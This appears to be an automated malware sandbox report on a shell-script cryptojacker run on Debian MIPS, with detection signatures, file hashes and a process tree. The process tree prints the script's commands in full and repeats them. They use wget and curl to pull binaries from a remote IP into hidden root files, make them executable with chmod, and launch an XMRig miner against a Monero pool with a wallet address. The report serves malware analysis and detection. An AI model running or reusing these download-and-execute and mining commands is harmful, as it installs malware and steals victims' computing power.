Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    21/10/2024, 01:53

General

  • Target

    37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh

  • Size

    700B

  • MD5

    c4d089011765cf8fa828d28b6eeeac3e

  • SHA1

    43d933e706b0eefd0db2b5acba19205ebc1af2bd

  • SHA256

    37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19

  • SHA512

    3f55a27fc44062f48d0ee1c11c7b2ece0d3478e89744618d337dd2854b3b68e7e6161d0e38e21b32b4f85a1ee2d2fb523c7b94cc984fdff36ef65a9ddf45bae9

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • File and Directory Permissions Modification 1 TTPs 22 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 13 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
    /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
    1⤵
      PID:700
      • /usr/bin/wget
        wget 205.185.117.101/log2 -O /dev/null
        2⤵
          PID:702
        • /usr/bin/curl
          curl -L 205.185.117.101/log2 -o /dev/null
          2⤵
          • Reads runtime system information
          PID:719
        • /usr/bin/wget
          wget 205.185.117.101/__min__ -O /.__min__
          2⤵
            PID:727
          • /usr/bin/wget
            wget 205.185.117.101/__min__c -O /.__min__c
            2⤵
              PID:804
            • /usr/bin/wget
              wget 205.185.117.101/__min__m -O /.__min__m
              2⤵
                PID:805
              • /bin/chmod
                chmod +x /.__min__
                2⤵
                • File and Directory Permissions Modification
                PID:809
              • /bin/chmod
                chmod +x /.__min__c
                2⤵
                • File and Directory Permissions Modification
                PID:810
              • /bin/chmod
                chmod +x /.__min__m
                2⤵
                • File and Directory Permissions Modification
                PID:811
              • /usr/bin/nproc
                nproc --all
                2⤵
                • Enumerates kernel/hardware configuration
                PID:812
              • /bin/hostname
                hostname
                2⤵
                  PID:814
                • /.__min__c
                  /.__min__c
                  2⤵
                  • Executes dropped EXE
                  PID:815
                • /.__min__
                  /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k
                  2⤵
                  • Executes dropped EXE
                  • System Network Configuration Discovery
                  PID:817
                • /usr/bin/wget
                  wget 205.185.117.101/__min__ -O /.__min__
                  2⤵
                    PID:819
                  • /usr/bin/wget
                    wget 205.185.117.101/__min__c -O /.__min__c
                    2⤵
                      PID:820
                    • /usr/bin/wget
                      wget 205.185.117.101/__min__m -O /.__min__m
                      2⤵
                        PID:821
                      • /bin/chmod
                        chmod +x /.__min__c
                        2⤵
                        • File and Directory Permissions Modification
                        PID:822
                      • /bin/chmod
                        chmod +x /.__min__m
                        2⤵
                        • File and Directory Permissions Modification
                        PID:823
                      • /.__min__c
                        /.__min__c
                        2⤵
                        • Executes dropped EXE
                        PID:824
                      • /usr/bin/wget
                        wget 205.185.117.101/__min__c -O /.__min__c
                        2⤵
                          PID:826
                        • /usr/bin/wget
                          wget 205.185.117.101/__min__m -O /.__min__m
                          2⤵
                            PID:827
                          • /bin/chmod
                            chmod +x /.__min__c
                            2⤵
                            • File and Directory Permissions Modification
                            PID:828
                          • /bin/chmod
                            chmod +x /.__min__m
                            2⤵
                            • File and Directory Permissions Modification
                            PID:829
                          • /.__min__c
                            /.__min__c
                            2⤵
                            • Executes dropped EXE
                            PID:830
                          • /usr/bin/wget
                            wget 205.185.117.101/__min__c -O /.__min__c
                            2⤵
                              PID:832
                            • /usr/bin/wget
                              wget 205.185.117.101/__min__m -O /.__min__m
                              2⤵
                                PID:833
                              • /bin/chmod
                                chmod +x /.__min__c
                                2⤵
                                • File and Directory Permissions Modification
                                PID:834
                              • /bin/chmod
                                chmod +x /.__min__m
                                2⤵
                                • File and Directory Permissions Modification
                                PID:835
                              • /.__min__c
                                /.__min__c
                                2⤵
                                • Executes dropped EXE
                                PID:836
                              • /usr/bin/wget
                                wget 205.185.117.101/__min__c -O /.__min__c
                                2⤵
                                  PID:838
                                • /usr/bin/wget
                                  wget 205.185.117.101/__min__m -O /.__min__m
                                  2⤵
                                    PID:839
                                  • /bin/chmod
                                    chmod +x /.__min__
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:840
                                  • /bin/hostname
                                    hostname
                                    2⤵
                                      PID:841
                                    • /.__min__
                                      /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k
                                      2⤵
                                      • Executes dropped EXE
                                      • System Network Configuration Discovery
                                      PID:842
                                    • /usr/bin/wget
                                      wget 205.185.117.101/__min__ -O /.__min__
                                      2⤵
                                        PID:844
                                      • /bin/chmod
                                        chmod +x /.__min__c
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:845
                                      • /bin/chmod
                                        chmod +x /.__min__m
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:846
                                      • /.__min__c
                                        /.__min__c
                                        2⤵
                                        • Executes dropped EXE
                                        PID:847
                                      • /usr/bin/wget
                                        wget 205.185.117.101/__min__c -O /.__min__c
                                        2⤵
                                          PID:849
                                        • /usr/bin/wget
                                          wget 205.185.117.101/__min__m -O /.__min__m
                                          2⤵
                                            PID:850
                                          • /bin/chmod
                                            chmod +x /.__min__c
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:851
                                          • /bin/chmod
                                            chmod +x /.__min__m
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:852
                                          • /.__min__c
                                            /.__min__c
                                            2⤵
                                            • Executes dropped EXE
                                            PID:853
                                          • /usr/bin/wget
                                            wget 205.185.117.101/__min__c -O /.__min__c
                                            2⤵
                                              PID:855
                                            • /bin/chmod
                                              chmod +x /.__min__
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:856
                                            • /bin/hostname
                                              hostname
                                              2⤵
                                                PID:857
                                              • /.__min__
                                                /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k
                                                2⤵
                                                • Executes dropped EXE
                                                • System Network Configuration Discovery
                                                PID:858
                                              • /usr/bin/wget
                                                wget 205.185.117.101/__min__ -O /.__min__
                                                2⤵
                                                  PID:860
                                                • /usr/bin/wget
                                                  wget 205.185.117.101/__min__m -O /.__min__m
                                                  2⤵
                                                    PID:861
                                                  • /bin/chmod
                                                    chmod +x /.__min__c
                                                    2⤵
                                                    • File and Directory Permissions Modification
                                                    PID:862
                                                  • /bin/chmod
                                                    chmod +x /.__min__m
                                                    2⤵
                                                    • File and Directory Permissions Modification
                                                    PID:863
                                                  • /.__min__c
                                                    /.__min__c
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:864
                                                  • /usr/bin/wget
                                                    wget 205.185.117.101/__min__c -O /.__min__c
                                                    2⤵
                                                      PID:866
                                                    • /usr/bin/wget
                                                      wget 205.185.117.101/__min__m -O /.__min__m
                                                      2⤵
                                                        PID:867
                                                      • /bin/chmod
                                                        chmod +x /.__min__c
                                                        2⤵
                                                        • File and Directory Permissions Modification
                                                        PID:868
                                                      • /bin/chmod
                                                        chmod +x /.__min__m
                                                        2⤵
                                                        • File and Directory Permissions Modification
                                                        PID:869
                                                      • /.__min__c
                                                        /.__min__c
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:870
                                                      • /usr/bin/wget
                                                        wget 205.185.117.101/__min__c -O /.__min__c
                                                        2⤵
                                                          PID:872
                                                        • /usr/bin/wget
                                                          wget 205.185.117.101/__min__m -O /.__min__m
                                                          2⤵
                                                            PID:873
                                                          • /bin/chmod
                                                            chmod +x /.__min__
                                                            2⤵
                                                            • File and Directory Permissions Modification
                                                            PID:874
                                                          • /bin/hostname
                                                            hostname
                                                            2⤵
                                                              PID:875
                                                            • /.__min__
                                                              /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • System Network Configuration Discovery
                                                              PID:876
                                                            • /usr/bin/wget
                                                              wget 205.185.117.101/__min__ -O /.__min__
                                                              2⤵
                                                                PID:878
                                                              • /bin/chmod
                                                                chmod +x /.__min__c
                                                                2⤵
                                                                • File and Directory Permissions Modification
                                                                PID:879
                                                              • /bin/chmod
                                                                chmod +x /.__min__m
                                                                2⤵
                                                                • File and Directory Permissions Modification
                                                                PID:880
                                                              • /.__min__c
                                                                /.__min__c
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:881
                                                              • /usr/bin/wget
                                                                wget 205.185.117.101/__min__c -O /.__min__c
                                                                2⤵
                                                                  PID:883
                                                                • /usr/bin/wget
                                                                  wget 205.185.117.101/__min__m -O /.__min__m
                                                                  2⤵
                                                                    PID:884

                                                                Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • /.__min__

                                                                        Filesize

                                                                        8.2MB

                                                                        MD5

                                                                        8f96e8b4e9d26884c776c1b42a70bae5

                                                                        SHA1

                                                                        53a4166052211abf77e1edf0d71c7a6faae12cc5

                                                                        SHA256

                                                                        5e5fd0bc5f1bd663d7ccc2695c2b56bd382df3c7fdac605eb0ce3c0d5df24dc4

                                                                        SHA512

                                                                        4709a5ee74cf3e91472b64891eaf9cd7cd8bde6059be6fd892863274c505fd3cf5f5631d66d01ab645406adb76b6123d287d97e90a6c08bf8f8a935a6624dcec

                                                                      • /.__min__

                                                                        Filesize

                                                                        4.6MB

                                                                        MD5

                                                                        a9667595bdc8bbe37b6365102751fe19

                                                                        SHA1

                                                                        c2f53c873c3a0ae9939595fcea6c07bfc8573ace

                                                                        SHA256

                                                                        a99f1e801f9109a1381b10f2651a3a76a8c490e7ab778258521c787bcecb3689

                                                                        SHA512

                                                                        21b9db3ad2116228853454f248082af8de637fcec4594ddabb66697c9a14a0a7aeff0618e259a2008b73abd6c23c8348c327b36cd830b4a444996a6bd488a69f

                                                                      • /.__min__c

                                                                        Filesize

                                                                        1.6MB

                                                                        MD5

                                                                        d3e378df1f5f920faaf9ef9e14a54f55

                                                                        SHA1

                                                                        b039ff3865762819392cec53eeac7c8ee0a630c3

                                                                        SHA256

                                                                        58fa45ce3665fd665bde9589297a5a34c8df403e8732eb7bdc77d00c669fac29

                                                                        SHA512

                                                                        40ad13e858412d4d809d5eccb55c4e31ab65183f9064daea2d2b5e5bb311de4d43121337bb523ff1128cb9bd61319367de7e62f96ed2065b680f53371623d358

                                                                      • /.__min__m

                                                                        Filesize

                                                                        2.9MB

                                                                        MD5

                                                                        d98aa7684a42d8197b0eb2946c6d4fab

                                                                        SHA1

                                                                        a5a7cb1c92f7c9ce302caaaab7d52f70ce7564da

                                                                        SHA256

                                                                        bacd68209fed7455e465c223d55af9574e23616f94e52c1c10ee7a1b8673898e

                                                                        SHA512

                                                                        e2cce2d0e96546bfe233e8294d49ed020db89c2a5968e57a2d84b9cd02cf71060805d765050792d81d0a238cf22eb41a030d6364256115bba5f43cb40f99b1ee